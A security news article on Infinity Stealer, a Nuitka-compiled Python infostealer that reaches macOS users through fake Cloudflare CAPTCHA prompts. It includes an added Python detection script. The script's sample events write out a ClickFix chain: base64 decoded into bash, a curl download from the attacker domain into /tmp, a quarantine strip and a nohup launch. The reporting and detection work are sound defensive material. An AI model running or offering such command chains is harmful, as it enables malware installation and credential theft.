New Infinity Stealer malware grabs macOS data via ClickFix lures
A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler.
The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflare's human verification check to trick users into executing malicious code.
Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
Because Nuitka produces a native binary by compiling the Python script into C code, the resulting executable is more resistant to static analysis.
Compared to PyInstaller, which bundles Python with bytecode, it's more evasive because it produces a real native binary with no obvious bytecode layer, making reverse engineering much harder.
"The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware," Malwarebytes says.
Attack chain
The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare and asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.
The command decodes a Bash script that writes the stage-2 payload (the Nuitka loader) to /tmp, removes its quarantine flag, and executes it via "nohup." It then passes the command-and-control (C2) address and a token to the loader via environment variables, deletes itself, and closes the Terminal window.
The Nuitka loader is an 8.6 MB Mach-O binary that embeds a 35 MB zstd-compressed archive holding the stage-3 payload (UpdateHelper.bin), which is the Infinity Stealer malware itself.
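One way to turn the chain described above into a detection, as an added example that is not part of the article or of Malwarebytes' research: a small Python checker that scores process-execution events per Terminal session for the sequence "base64 decode piped to a shell, download to /tmp, quarantine flag stripped from a /tmp file, nohup launch from /tmp". The event format, the session ids and the sample events are constructed for this example (the defanged domain is the one named in the article).

```python
import re
from collections import defaultdict

# Constructed sample events in a hypothetical EDR shape: one record per
# executed command, tagged with the Terminal session it belongs to.
SAMPLE_EVENTS = [
    {"session": "s1", "parent": "Terminal",
     "cmd": "echo B64BLOB | base64 -D | bash"},
    {"session": "s1", "parent": "bash",
     "cmd": "curl -s https://update-check[.]com/stage2 -o /tmp/.UpdateHelper"},
    {"session": "s1", "parent": "bash",
     "cmd": "xattr -d com.apple.quarantine /tmp/.UpdateHelper"},
    {"session": "s1", "parent": "bash", "cmd": "nohup /tmp/.UpdateHelper"},
    # Benign session: decoding a file and clearing quarantine on a Downloads item.
    {"session": "s2", "parent": "Terminal",
     "cmd": "base64 -D notes.b64 > notes.txt"},
    {"session": "s2", "parent": "Terminal",
     "cmd": "xattr -d com.apple.quarantine ~/Downloads/tool.pkg"},
]

# Each rule matches one step of the ClickFix chain; /private/tmp is the
# real path behind /tmp on macOS, so both spellings are accepted.
TMP = r"/(private/)?tmp/"
RULES = {
    "decode_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba)?sh\b"),
    "write_to_tmp": re.compile(r"\bcurl\b.*\s-o\s*" + TMP),
    "strip_quarantine_tmp": re.compile(r"xattr\s+-d\s+com\.apple\.quarantine\s+" + TMP),
    "nohup_from_tmp": re.compile(r"\bnohup\s+" + TMP + r"\S+"),
}


def evaluate_sessions(events):
    """Return, per session, the sorted names of the chain steps observed."""
    hits = defaultdict(set)
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits[ev["session"]].add(name)
    return {s: sorted(names) for s, names in hits.items()}


def alerts(events, threshold=3):
    """Sessions in which at least `threshold` distinct chain steps were seen.
    A single step (e.g. xattr -d on a downloaded installer) is normal admin
    activity; several of them in one session is the ClickFix pattern."""
    return {s: n for s, n in evaluate_sessions(events).items() if len(n) >= threshold}


if __name__ == "__main__":
    for session, steps in alerts(SAMPLE_EVENTS).items():
        print(f"ALERT session={session} steps={steps}")
```

The threshold keeps a lone `xattr -d` or `base64 -D` from paging anyone; tune it against your own telemetry before deploying.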
Before starting to collect sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized/sandboxed environment.
Malwarebytes' analysis of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the following data:
- Credentials from Chromium-based browsers and Firefox
- macOS Keychain entries
- Cryptocurrency wallets
- Plaintext secrets in developer files, such as .env
All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors upon completion of the operation.
Malwarebytes underlines that the appearance of malware like Infinity Stealer is proof that threats to macOS users are only getting more advanced and targeted.
Users should never paste commands they find online into Terminal unless they fully understand what those commands do.